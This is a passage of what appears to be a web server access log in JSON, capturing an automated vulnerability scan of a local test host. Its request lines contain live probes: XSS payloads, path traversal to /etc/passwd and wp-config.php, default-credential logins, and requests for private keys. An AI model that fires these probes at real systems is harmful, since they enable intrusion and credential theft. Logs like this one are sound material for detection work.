}}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /query-laravel HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /action/usermanager.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.320","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zabbix/setup.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.924","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /b/l.e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.239","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/20 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.234","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /sphinx-graphiql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.241","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /interface/login/login.php?site=default HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.252","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /private.pem HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.331","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"{\x22userName\x22:\x22admin\x22,\x22password\x22:\x22cs141-snmp\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:52 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E& HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /../../../..//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.245","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /setup.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.240","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.254","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /changePassword?username=administrator HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /subscriptions HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.258","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/21 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/background.jpg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /proxy HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.254","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.325","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"{\x22userName\x22:\x22engineer\x22,\x22password\x22:\x22engineer\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/dump HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.442","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"yr=2021&mh=6&fname=../../../../../../../../etc/passwd","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /viewlog.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.288","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.415","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.361","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ProtectManager/Logon HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"{\x22userName\x22:\x22guest\x22,\x22password\x22:\x22guest\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"form_id=user_login&name={{username}}&pass={{password}}&op=Log+in","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /?q=user%2Flogin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"28fHqX8fFDTgvDrJoDczYnTE2Rv.tld","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /server/sdk/rest/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.616","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.353","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"{u:\x22admin\x22, t:\x22undefined\x22, p:\x22trilithic\x22, d:\x22\x22, r:false, w:false}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.394","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.393","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.365","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/componentutilslogin.jpg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) 